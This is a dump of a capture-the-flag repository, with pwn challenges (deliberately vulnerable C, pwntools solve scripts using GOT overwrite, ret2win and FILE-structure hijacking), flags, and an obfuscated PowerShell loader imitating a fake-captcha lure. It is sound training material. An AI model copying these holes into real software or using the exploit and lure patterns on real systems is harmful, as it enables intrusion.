Your flag is blahaj{3X1t_h4nDleRs_0vErr4T3d} -------------------------------------------------------------------------------- /Challenges/Pwn/onewrite/src/ld-linux-x86-64.so.2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/onewrite/src/ld-linux-x86-64.so.2 -------------------------------------------------------------------------------- /Challenges/Pwn/onewrite/src/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/onewrite/src/libc.so.6 -------------------------------------------------------------------------------- /Challenges/Pwn/password/challenge.yml: -------------------------------------------------------------------------------- 1 | name: IsEven 2 | author: fern 3 | category: pwn 4 | description: I wrote this amazing new service to tell you if a number is even, try and hack it! 
5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{g0T_Ov3rRide} 13 | 14 | files: 15 | - dist/chal.c 16 | - dist/chal 17 | 18 | connection_info: nc hostname 8000 19 | 20 | state: visible 21 | version: "0.1" 22 | -------------------------------------------------------------------------------- /Challenges/Pwn/password/dist/chal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/password/dist/chal -------------------------------------------------------------------------------- /Challenges/Pwn/password/dist/chal.c: -------------------------------------------------------------------------------- 1 | //gcc chal.c -m32 -no-pie -o chal 2 | 3 | #include 4 | #include 5 | 6 | void win(){ 7 | system("cat flag.txt"); 8 | } 9 | 10 | void isEven(){ 11 | int num; 12 | printf("Enter your number: "); 13 | scanf("%d", num); 14 | 15 | if(num % 2 == 0){ 16 | puts("The number is even!"); 17 | }else{ 18 | puts("The number is odd!"); 19 | } 20 | } 21 | void getFeedback(){ 22 | char feedback[100]; 23 | printf("We know our service is amazing, so you can give feedback before using it!\nFeedback: "); 24 | scanf("%100s", feedback); 25 | } 26 | 27 | int main(){ 28 | setvbuf(stdin, NULL, _IONBF, 0); 29 | setvbuf(stdout, NULL, _IONBF, 0); 30 | printf("IsEven Service\n"); 31 | getFeedback(); 32 | isEven(); 33 | return 0; 34 | } -------------------------------------------------------------------------------- /Challenges/Pwn/password/solution.md: -------------------------------------------------------------------------------- 1 | # Solution 2 | 3 | Solve script in `solve/`. 
-------------------------------------------------------------------------------- /Challenges/Pwn/password/solve/chal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/password/solve/chal -------------------------------------------------------------------------------- /Challenges/Pwn/password/solve/soln.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | elf = context.binary = ELF("chal") 3 | p = remote("localhost", 8000)# process() 4 | p.sendline(b"A"*96 + p32(elf.got["puts"])) 5 | p.sendline(str(elf.sym["win"]).encode()) 6 | p.interactive() -------------------------------------------------------------------------------- /Challenges/Pwn/password/src/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM debian:12 2 | 3 | COPY ./chal /srv/app/run 4 | COPY ./entry.sh /srv/app/entry.sh 5 | COPY ./flag.txt /srv/app/flag.txt 6 | RUN chmod 555 /srv/app/run 7 | RUN chmod 444 /srv/app/flag.txt 8 | RUN chmod 555 /srv/app/entry.sh 9 | RUN dpkg --add-architecture i386 10 | RUN apt-get update && apt-get install -y socat libc6:i386 libstdc++6:i386 11 | 12 | RUN addgroup --gid 1001 nonroot && \ 13 | adduser --uid 1001 --gid 1001 --disabled-password --gecos "" nonroot && \ 14 | echo 'nonroot ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers 15 | USER 1001 16 | 17 | WORKDIR /srv/app 18 | 19 | CMD [ "/srv/app/entry.sh" ] -------------------------------------------------------------------------------- /Challenges/Pwn/password/src/chal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/password/src/chal -------------------------------------------------------------------------------- 
/Challenges/Pwn/password/src/chal.c: --------------------------------------------------------------------------------
//gcc chal.c -m32 -no-pie -o chal
// Build note: -m32 produces a 32-bit binary and -no-pie links it at a fixed
// load address, so the addresses of its code and global data do not change
// between runs.

// NOTE(review): both header names were stripped when this page was rendered.
// The calls below need <stdio.h> (printf, scanf, puts, setvbuf) and
// <stdlib.h> (system); the original order cannot be recovered from here.
#include
#include

/* Prints flag.txt by shelling out to `cat`. Nothing in this file calls it:
 * main() only reaches getFeedback() and isEven(). */
void win(){
    system("cat flag.txt");
}

/* Reads one integer and reports whether it is even.
 *
 * Defect (deliberate in this challenge): scanf("%d", ...) needs an int *,
 * but `num` itself is passed. `num` is uninitialized, so scanf stores the
 * parsed integer through whatever value that stack slot already holds:
 * undefined behaviour, in practice a write to an unvalidated address.
 * The parity test below then reads `num`, which scanf never assigned.
 * Correct form: scanf("%d", &num), with the return value checked.
 * gcc's -Wformat (part of -Wall) reports the argument type mismatch. */
void isEven(){
    int num;
    printf("Enter your number: ");
    scanf("%d", num);   /* should be &num; see the function comment */

    if(num % 2 == 0){
        puts("The number is even!");
    }else{
        puts("The number is odd!");
    }
}
/* Prompts for one whitespace-delimited word of feedback and discards it.
 *
 * "%100s" lets scanf store up to 100 characters and then the terminating
 * NUL, i.e. 101 bytes into a 100-byte array: a one-byte overflow. The field
 * width should be 99 (sizeof feedback - 1).
 * The bytes written here are not cleared on return, so they stay in stack
 * memory that the next call from main() reuses. That is how an uninitialized
 * local in a later function can end up holding caller-supplied data.
 * NOTE(review): the exact frame overlap depends on the compiler; it cannot
 * be confirmed from the source alone. */
void getFeedback(){
    char feedback[100];
    printf("We know our service is amazing, so you can give feedback before using it!\nFeedback: ");
    scanf("%100s", feedback);   /* width must leave room for the NUL: %99s */
}

/* Switches stdin and stdout to unbuffered mode, prints the banner, then runs
 * the feedback prompt followed by the parity check. Always returns 0. */
int main(){
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);
    printf("IsEven Service\n");
    getFeedback();
    isEven();
    return 0;
}
-------------------------------------------------------------------------------- /Challenges/Pwn/password/src/docker-compose.yml: -------------------------------------------------------------------------------- 1 | services: 2 | password: 3 | privileged: false 4 | build: . 5 | ports: 6 | - "8000:8000" 7 | -------------------------------------------------------------------------------- /Challenges/Pwn/password/src/entry.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | socat TCP-LISTEN:8000,nodelay,reuseaddr,fork EXEC:"timeout -s KILL 10m /srv/app/run" -------------------------------------------------------------------------------- /Challenges/Pwn/password/src/flag.txt: -------------------------------------------------------------------------------- 1 | blahaj{g0T_Ov3rRide} -------------------------------------------------------------------------------- /Challenges/Pwn/pwn100/challenge.yml: -------------------------------------------------------------------------------- 1 | name: Pwn 100 2 | author: fern 3 | category: pwn 4 | description: Welcome to the first pwn challenge! 
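Can you exploit this program to get the flag? 5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{Sm4sH_tH3_sT4cK} 13 | 14 | files: 15 | - dist/chal.c 16 | - dist/chal 17 | 18 | connection_info: nc hostname 8000 19 | 20 | state: visible 21 | version: "0.1" 22 | -------------------------------------------------------------------------------- /Challenges/Pwn/pwn100/dist/chal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/pwn100/dist/chal -------------------------------------------------------------------------------- /Challenges/Pwn/pwn100/solution.md: -------------------------------------------------------------------------------- 1 | # Solution 2 | 3 | Paste the text `AAAAAAAAAAAAAAAAAAAAAAAABiBiBiBi`. -------------------------------------------------------------------------------- /Challenges/Pwn/pwn100/src/Dockerfile: --------------------------------------------------------------------------------
# Image for the pwn100 service: the challenge binary served over TCP by socat,
# running as an unprivileged user.
FROM debian:12

# COPY leaves both files owned by root; mode 555 makes them readable and
# executable by everyone and writable by no one, so the service account
# cannot replace the binary or the entry script.
COPY ./chal /srv/app/run
COPY ./entry.sh /srv/app/entry.sh
RUN chmod 555 /srv/app/run /srv/app/entry.sh

# Index refresh, install and list cleanup share one layer so a cached, stale
# package index is never reused by a later install.
RUN apt-get update && \
    apt-get install -y socat && \
    rm -rf /var/lib/apt/lists/*

# Dedicated unprivileged account for the service. No sudoers entry is added:
# a "NOPASSWD: ALL" rule for this account would make any code execution inside
# the service equivalent to root as soon as a sudo binary is present in the
# image, which defeats the USER drop below.
RUN addgroup --gid 1001 nonroot && \
    adduser --uid 1001 --gid 1001 --disabled-password --gecos "" nonroot
USER 1001

WORKDIR /srv/app

CMD [ "/srv/app/entry.sh" ]
-------------------------------------------------------------------------------- /Challenges/Pwn/pwn100/src/chal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/pwn100/src/chal -------------------------------------------------------------------------------- 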
/Challenges/Pwn/pwn100/src/docker-compose.yml: -------------------------------------------------------------------------------- 1 | services: 2 | pwn100: 3 | privileged: false 4 | build: . 5 | ports: 6 | - "8000:8000" 7 | -------------------------------------------------------------------------------- /Challenges/Pwn/pwn100/src/entry.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | socat TCP-LISTEN:8000,nodelay,reuseaddr,fork EXEC:"timeout -s KILL 10m /srv/app/run" -------------------------------------------------------------------------------- /Challenges/Pwn/pwn101/challenge.yml: -------------------------------------------------------------------------------- 1 | name: Pwn 101 2 | author: fern 3 | category: pwn 4 | description: You beat pwn 100, here's a harder level for you! Can you exploit the program to get the flag? 5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{0V3rRid1Ng_r3TuRn_4dDr3Ss} 13 | 14 | files: 15 | - dist/chal.c 16 | - dist/chal 17 | 18 | connection_info: nc hostname 8000 19 | 20 | state: visible 21 | version: "0.1" 22 | -------------------------------------------------------------------------------- /Challenges/Pwn/pwn101/dist/chal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/pwn101/dist/chal -------------------------------------------------------------------------------- /Challenges/Pwn/pwn101/solution.md: -------------------------------------------------------------------------------- 1 | # Solution 2 | 3 | Solve script in `solve/`. 
-------------------------------------------------------------------------------- /Challenges/Pwn/pwn101/solve/chal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/pwn101/solve/chal -------------------------------------------------------------------------------- /Challenges/Pwn/pwn101/solve/soln.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | elf = ELF("chal") 3 | p = remote("localhost", 8000) #process("./chal") 4 | p.clean() 5 | p.sendline(b"0") 6 | p.clean() 7 | p.sendline(b"A"*40 + p64(elf.sym["win"])) 8 | p.clean() 9 | p.sendline(b"1") 10 | p.interactive() -------------------------------------------------------------------------------- /Challenges/Pwn/pwn101/src/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM debian:12 2 | 3 | COPY ./chal /srv/app/run 4 | COPY ./entry.sh /srv/app/entry.sh 5 | RUN chmod 555 /srv/app/run 6 | RUN chmod 555 /srv/app/entry.sh 7 | RUN apt-get update && apt-get install -y socat 8 | 9 | RUN addgroup --gid 1001 nonroot && \ 10 | adduser --uid 1001 --gid 1001 --disabled-password --gecos "" nonroot && \ 11 | echo 'nonroot ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers 12 | USER 1001 13 | 14 | WORKDIR /srv/app 15 | 16 | CMD [ "/srv/app/entry.sh" ] -------------------------------------------------------------------------------- /Challenges/Pwn/pwn101/src/chal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/pwn101/src/chal -------------------------------------------------------------------------------- /Challenges/Pwn/pwn101/src/docker-compose.yml: -------------------------------------------------------------------------------- 1 | 
services: 2 | pwn101: 3 | privileged: false 4 | build: . 5 | ports: 6 | - "8000:8000" 7 | -------------------------------------------------------------------------------- /Challenges/Pwn/pwn101/src/entry.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | socat TCP-LISTEN:8000,nodelay,reuseaddr,fork EXEC:"timeout -s KILL 10m /srv/app/run" -------------------------------------------------------------------------------- /Challenges/Pwn/pwn201/challenge.yml: -------------------------------------------------------------------------------- 1 | name: Pwn 201 2 | author: fern 3 | category: pwn 4 | description: Are you ready for the second level of pwn? 5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{F1l3_sTruCt_H1j4CkiNg} 13 | 14 | files: 15 | - dist/chal.c 16 | - dist/chal 17 | 18 | connection_info: nc hostname 8000 19 | 20 | state: visible 21 | version: "0.1" 22 | -------------------------------------------------------------------------------- /Challenges/Pwn/pwn201/dist/chal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/pwn201/dist/chal -------------------------------------------------------------------------------- /Challenges/Pwn/pwn201/dist/chal.c: -------------------------------------------------------------------------------- 1 | //gcc chal.c -fstack-protector -no-pie -o chal 2 | #include 3 | #include 4 | #include 5 | void win(){ 6 | system("cat flag.txt"); 7 | } 8 | int main(){ 9 | setvbuf(stdout, NULL, _IONBF, 0); 10 | setvbuf(stdin, NULL, _IONBF, 0); 11 | setvbuf(stderr, NULL, _IONBF, 0); 12 | char leet[10] = {0}; 13 | puts("What is your name?"); 14 | read(0, stdin, 480); 15 | puts("Are you 1337?"); 16 | fgets(leet, 9, stdin); 17 | puts("You are not 1337."); 18 | } 
-------------------------------------------------------------------------------- /Challenges/Pwn/pwn201/solution.md: -------------------------------------------------------------------------------- 1 | # Solution 2 | 3 | Solve script in `solve/`. -------------------------------------------------------------------------------- /Challenges/Pwn/pwn201/solve/chal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/pwn201/solve/chal -------------------------------------------------------------------------------- /Challenges/Pwn/pwn201/solve/soln.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | elf = context.binary = ELF("chal") 3 | p = remote("127.0.0.1", 8000) #process() 4 | cls = lambda: print(p.clean(timeout=0.2).decode()) 5 | 6 | cls() 7 | fs = FileStructure() 8 | pay = fs.read(elf.got["puts"], 10) 9 | p.send(pay) 10 | cls() 11 | p.sendline(p64(elf.sym["win"])) 12 | p.interactive() -------------------------------------------------------------------------------- /Challenges/Pwn/pwn201/src/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM debian:12 2 | 3 | COPY ./chal /srv/app/run 4 | COPY ./entry.sh /srv/app/entry.sh 5 | COPY ./flag.txt /srv/app/flag.txt 6 | RUN chmod 555 /srv/app/run 7 | RUN chmod 444 /srv/app/flag.txt 8 | RUN chmod 555 /srv/app/entry.sh 9 | RUN apt-get update && apt-get install -y socat 10 | 11 | RUN addgroup --gid 1001 nonroot && \ 12 | adduser --uid 1001 --gid 1001 --disabled-password --gecos "" nonroot && \ 13 | echo 'nonroot ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers 14 | USER 1001 15 | 16 | WORKDIR /srv/app 17 | 18 | CMD [ "/srv/app/entry.sh" ] -------------------------------------------------------------------------------- /Challenges/Pwn/pwn201/src/chal: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/pwn201/src/chal -------------------------------------------------------------------------------- /Challenges/Pwn/pwn201/src/chal.c: --------------------------------------------------------------------------------
//gcc chal.c -fstack-protector -no-pie -o chal
// Build note: -fstack-protector adds stack canaries and -no-pie links the
// binary at a fixed load address. The canary does not cover the defect in
// main(), because that write does not land on the stack.

// NOTE(review): the three header names were stripped when this page was
// rendered. The calls below need <stdio.h> (setvbuf, puts, fgets),
// <stdlib.h> (system) and <unistd.h> (read); the original order cannot be
// recovered from here.
#include
#include
#include
/* Prints flag.txt by shelling out to `cat`. Nothing in this file calls it. */
void win(){
    system("cat flag.txt");
}
/* Asks two questions and always answers "You are not 1337."; the contents of
 * `leet` are never inspected.
 *
 * Defect (deliberate in this challenge): the second argument of read() is
 * `stdin`, a FILE *, not a character buffer. Up to 480 bytes from descriptor
 * 0 are therefore copied over the object `stdin` points to, which is libc's
 * own stream record for standard input. The following fgets() then runs
 * libc's stream code on a record whose fields came from the peer.
 * Correct form: read into a dedicated char array, bounded by its size, and
 * never use a FILE object as a write target.
 * NOTE(review): 480 looks larger than glibc's FILE on x86-64, so the write
 * presumably also runs past that object; confirm against the shipped libc.
 *
 * main() has no return statement; in C99 and later, reaching the end of
 * main() returns 0. */
int main(){
    /* All three standard streams are switched to unbuffered mode. */
    setvbuf(stdout, NULL, _IONBF, 0);
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stderr, NULL, _IONBF, 0);
    char leet[10] = {0};
    puts("What is your name?");
    read(0, stdin, 480);     /* destination is the FILE object, not a buffer */
    puts("Are you 1337?");
    fgets(leet, 9, stdin);   /* at most 8 characters plus NUL: within leet[10] */
    puts("You are not 1337.");
}
-------------------------------------------------------------------------------- /Challenges/Pwn/pwn201/src/docker-compose.yml: -------------------------------------------------------------------------------- 1 | services: 2 | pwn201: 3 | privileged: false 4 | build: . 5 | ports: 6 | - "8000:8000" 7 | -------------------------------------------------------------------------------- /Challenges/Pwn/pwn201/src/entry.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | socat TCP-LISTEN:8000,nodelay,reuseaddr,fork EXEC:"timeout -s KILL 10m /srv/app/run" -------------------------------------------------------------------------------- /Challenges/Pwn/pwn201/src/flag.txt: -------------------------------------------------------------------------------- 1 | blahaj{F1l3_sTruCt_H1j4CkiNg} -------------------------------------------------------------------------------- /Challenges/Pwn/speed/challenge.yml: -------------------------------------------------------------------------------- 1 | name: I am speed 2 | author: fern 3 | category: pwn 4 | description: 30 programs. 
60 seconds. Can you hack them all? 5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{I_4M_s0_Sp33d} 13 | 14 | files: 15 | 16 | connection_info: nc hostname 8000 17 | 18 | state: visible 19 | version: "0.1" 20 | -------------------------------------------------------------------------------- /Challenges/Pwn/speed/soln/auto.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import base64, os, time 3 | os.chdir("/tmp") 4 | c = remote("localhost", 8000) 5 | print(c.recvline().strip()) 6 | c.sendline(b"y") 7 | for i in range(30): 8 | decoded_data = base64.b64decode(c.recvline().strip()) 9 | print(c.recvline().strip()) 10 | with open("prog", "wb") as file: 11 | file.write(decoded_data) 12 | os.system("chmod +x prog") 13 | context.binary = elf = ELF("prog") 14 | p = process() 15 | p.sendline(cyclic(1000)) 16 | p.wait() 17 | core = p.corefile 18 | stack = core.rsp 19 | pattern = core.read(stack, 4) 20 | rip_offset = cyclic_find(pattern) 21 | print("rip is %d" % rip_offset) 22 | win = elf.sym["win"] 23 | c.sendline(b"A" * rip_offset + p64(win)) 24 | print(c.recvline().strip()) 25 | c.interactive() -------------------------------------------------------------------------------- /Challenges/Pwn/speed/solution.md: -------------------------------------------------------------------------------- 1 | # Solution 2 | 3 | Solution in `soln/`. 
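-------------------------------------------------------------------------------- /Challenges/Pwn/speed/src/Dockerfile: --------------------------------------------------------------------------------
# Image for the "I am speed" service: Python 3.11 on Debian bookworm plus gcc,
# running app.py as an unprivileged user.
FROM python:3.11-slim-bookworm

# copy the requirements file into the image
COPY ./requirements.txt /app/requirements.txt

# switch working directory
WORKDIR /app

# Index refresh, install and list cleanup share one layer so a cached, stale
# package index is never reused by a later install. Recommended packages are
# left enabled on purpose; disabling them would change what gets installed.
# NOTE(review): gcc is presumably used by app.py at runtime; app.py is not
# shown here, so confirm before trimming it.
RUN apt-get update && \
    apt-get install -y gcc && \
    rm -rf /var/lib/apt/lists/*

# install the dependencies and packages in the requirements file
RUN pip install -r requirements.txt

# copy every content from the local file to the image
COPY . /app

# Dedicated unprivileged account for the service. No sudoers entry is added:
# a "NOPASSWD: ALL" rule for this account would make any code execution inside
# the service equivalent to root as soon as a sudo binary is present in the
# image, which defeats the USER drop below.
RUN addgroup --gid 1001 nonroot && \
    adduser --uid 1001 --gid 1001 --disabled-password --gecos "" nonroot
USER 1001

# configure the container to run in an executed manner
ENTRYPOINT [ "python" ]

CMD ["app.py" ]
-------------------------------------------------------------------------------- /Challenges/Pwn/speed/src/docker-compose.yml: -------------------------------------------------------------------------------- 1 | services: 2 | speed: 3 | privileged: false 4 | build: . 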
5 | ports: 6 | - "8000:8000" 7 | -------------------------------------------------------------------------------- /Challenges/Pwn/speed/src/requirements.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/speed/src/requirements.txt -------------------------------------------------------------------------------- /Challenges/README.md: -------------------------------------------------------------------------------- 1 | ## How to add your challenges 2 | 3 | Create a folder with the name of your challenge (be creative) 4 | 5 | Folder structure example: 6 | ``` 7 | challengename 8 | - src 9 | - - server.py 10 | - - Dockerfile 11 | - dist 12 | - - server.py 13 | - - Dockerfile 14 | - solution.md 15 | - challenge.yml 16 | ``` 17 | 18 | The `src` folder contains everything that goes into the creation of the challenge, such as the Dockerfile, server file, Makefile, etc. 19 | 20 | The `dist` folder contains everything that is given to the players as source code (remember to remove flags) 21 | 22 | The `solution.md` contains the method to solve the challenge (please be elaborate) 23 | 24 | The `challenge.yml` contains the Author name, Challenge name, Description, Hint (if any), Category, Difficulty, Points. 25 | It follows the CTFd format found [here](https://github.com/CTFd/ctfcli/blob/master/ctfcli/spec/challenge-example.yml) 26 | -------------------------------------------------------------------------------- /Challenges/Rev/README.md: -------------------------------------------------------------------------------- 1 | Rev Challenges -------------------------------------------------------------------------------- /Challenges/Rev/areyouarobot/challenge.yml: -------------------------------------------------------------------------------- 1 | name: Are You A Robot? 
2 | author: scuffed 3 | category: rev 4 | description: "ARE YOU STRUGGLING TO LEVEL UP IN CLASHER KINGS? GET YOUR FREE CRYSTALS AND MANA HERE! TOTALLY LEGIT AND 100% SAFE, YOU JUST NEED TO VERIFY YOU'RE A HUMAN AND IT'S ALL YOURS!\n\nDisclaimer: This challenge may trip Windows Defender or any other antivirus solution you have installed. **The code in this challenge is perfectly safe and will not cause any impact to your computer.** It's advised to simply make an exception for this challenge rather than switching off your antivirus. Also, this website does not actually generate any mana or crystals. Sorry. " 5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{free_powershell_glitch} 13 | 14 | state: visible 15 | version: "0.1" 16 | -------------------------------------------------------------------------------- /Challenges/Rev/areyouarobot/solution.md: -------------------------------------------------------------------------------- 1 | Decode the powershell that gets pasted into the clipboard, just From Base64 followed by a Raw Inflate in CyberChef. 2 | 3 | flag: `blahaj{free_powershell_glitch}` -------------------------------------------------------------------------------- /Challenges/Rev/areyouarobot/src/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM lipanski/docker-static-website:latest 2 | 3 | # Copy your static files 4 | COPY . . 
5 | 6 | CMD ["/busybox-httpd", "-f", "-v", "-p", "8000"] -------------------------------------------------------------------------------- /Challenges/Rev/areyouarobot/src/bg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Rev/areyouarobot/src/bg.png -------------------------------------------------------------------------------- /Challenges/Rev/areyouarobot/src/captcha.ps1: -------------------------------------------------------------------------------- 1 | . ((vAriable '*mDr*').nAMe[3,11,2]-joIN'') ( NEw-obJeCT iO.STREamREAdEr(( NEw-obJeCT IO.ComPrEsSion.deFlatestREaM( [iO.meMorYstreAM] [sYstem.CoNvERT]::FrOMbAse64STring('ZY9Ra8JAEIT/yiLCWTD3Awx9KDTQUIzFIj7qNa53Z47d9G7PNIj/vfG1fRmG4RuYqenKHRbVTx8xJc8EM3+GxXGOdF3tPqtt87KuoMBvUB0n58WQeoIb7KMXLDZZ+iygvoJx5nI7R8RDzwPG5DCEgw1eWndXcAcMCf/V9pHJgphoUZbgLXH0ZPXEl3/Ij8c6MDRChyMIQ8sknjJqrVUJxznlEOB5Mm+cRO9qvTXDQ9Gc3nFcqIar1vGypjbkE07RKw/Tk9kv' ), [systEM.io.cOMPrEsSiOn.compReSSIonmoDE]::DECOMpReSs) ), [SyStEm.teXT.EncOdIng]::aSciI) ).ReaDtoenD( ) -------------------------------------------------------------------------------- /Challenges/Rev/areyouarobot/src/docker-compose.yml: -------------------------------------------------------------------------------- 1 | services: 2 | areyouarobot: 3 | privileged: false 4 | build: . 
5 | ports: 6 | - "8000:8000" 7 | -------------------------------------------------------------------------------- /Challenges/Rev/areyouarobot/src/favicon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Rev/areyouarobot/src/favicon.ico -------------------------------------------------------------------------------- /Challenges/Rev/areyouarobot/src/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Rev/areyouarobot/src/logo.png -------------------------------------------------------------------------------- /Challenges/Rev/assembly/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "assembly" 2 | author: "scuffed" 3 | category: rev 4 | description: Greetings reverse engineer! Here I've got a simple scrap of assembly source code written in MIPS. All I need of you is to determine the correct value of `flag` so that the `main` function returns `0` and not `-1` (in other words, the final value of the `a0` register is `0`)! Once solved, submit your flag as `blahaj{flag}` where `flag` is typed out in hex (e.g. `0xdeadbeef`). 5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{0x5caff01d} 13 | 14 | files: 15 | - dist/challenge.s 16 | 17 | state: visible 18 | 19 | version: "0.1" -------------------------------------------------------------------------------- /Challenges/Rev/assembly/solution.md: -------------------------------------------------------------------------------- 1 | whack MIPS, literally just a byte comparison. 
2 | 3 | Flag: `blahaj{0x5caff01d}` -------------------------------------------------------------------------------- /Challenges/Rev/badbreaking/dist/breaking: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Rev/badbreaking/dist/breaking -------------------------------------------------------------------------------- /Challenges/Rev/badbreaking/solution.md: -------------------------------------------------------------------------------- 1 | Intended solve: 2 | 1. Open in gdb 3 | 2. Use hardware breakpoints to extract 2 keys 4 | First key: 13688800432818270003 5 | Second key: 8513551167716696826 6 | 3. Get flag 7 | 8 | Trap: 9 | If you use software breakpoints, the first key is corrupted. You do not get the flag. 10 | 11 | Flag: `blahaj{bR3Ak1nG_H4RdlY_}` -------------------------------------------------------------------------------- /Challenges/Rev/blahajcryptor/sol.md: -------------------------------------------------------------------------------- 1 | key is generated by applying RC4 onto the system name (NOKOTAN) with the current timestamp (you can fuzz a range from the date modified value of flag.SMILE) 2 | figure out that you can pull a copy of the decryptor by looking at the transaction history of the blahajcoin and plucking any address that has transferred to the ransomware address 3 | figure out where to place the key in the binary (you can compare diffs) and patch a copy 4 | run the patched decryptor 5 | 6 | machine name: NOKOTAN, timestamp: 1726291110, key: 48-BB-C7-82-72-91-93-F2-D4-15-EB-EF-F1-B1-F4-1E 7 | 8 | flag: `blahaj{I_WANNA_CRY_SO_BAD}` -------------------------------------------------------------------------------- /Challenges/Rev/blahajcryptor/src/3Ff3i1QcR3WacYRgj2hmmqkdUykWRqFCKxY3QtDL8ET7.exe: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Rev/blahajcryptor/src/3Ff3i1QcR3WacYRgj2hmmqkdUykWRqFCKxY3QtDL8ET7.exe -------------------------------------------------------------------------------- /Challenges/Rev/blahajcryptor/src/5nhEj7fnwcBvrMbm8RdeJoiWo28isUqL7BhS4bRneB1m.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Rev/blahajcryptor/src/5nhEj7fnwcBvrMbm8RdeJoiWo28isUqL7BhS4bRneB1m.exe -------------------------------------------------------------------------------- /Challenges/Rev/blahajcryptor/src/7cgjCgUBZzcggXtLpwxY7ek2PD9dy8Y3ymEuFobwyTsh.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Rev/blahajcryptor/src/7cgjCgUBZzcggXtLpwxY7ek2PD9dy8Y3ymEuFobwyTsh.exe -------------------------------------------------------------------------------- /Challenges/Rev/blahajcryptor/src/B7HBaDA3US8dDNZ34icgNWnpBYZJvciqJp1hy8f9G6zF.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Rev/blahajcryptor/src/B7HBaDA3US8dDNZ34icgNWnpBYZJvciqJp1hy8f9G6zF.exe -------------------------------------------------------------------------------- /Challenges/Rev/blahajcryptor/src/Dockerfile: -------------------------------------------------------------------------------- 1 | # start by pulling the python image 2 | FROM python:3.12-slim 3 | 4 | RUN apt update 5 | 6 | # switch working directory 7 | WORKDIR /app 8 | 9 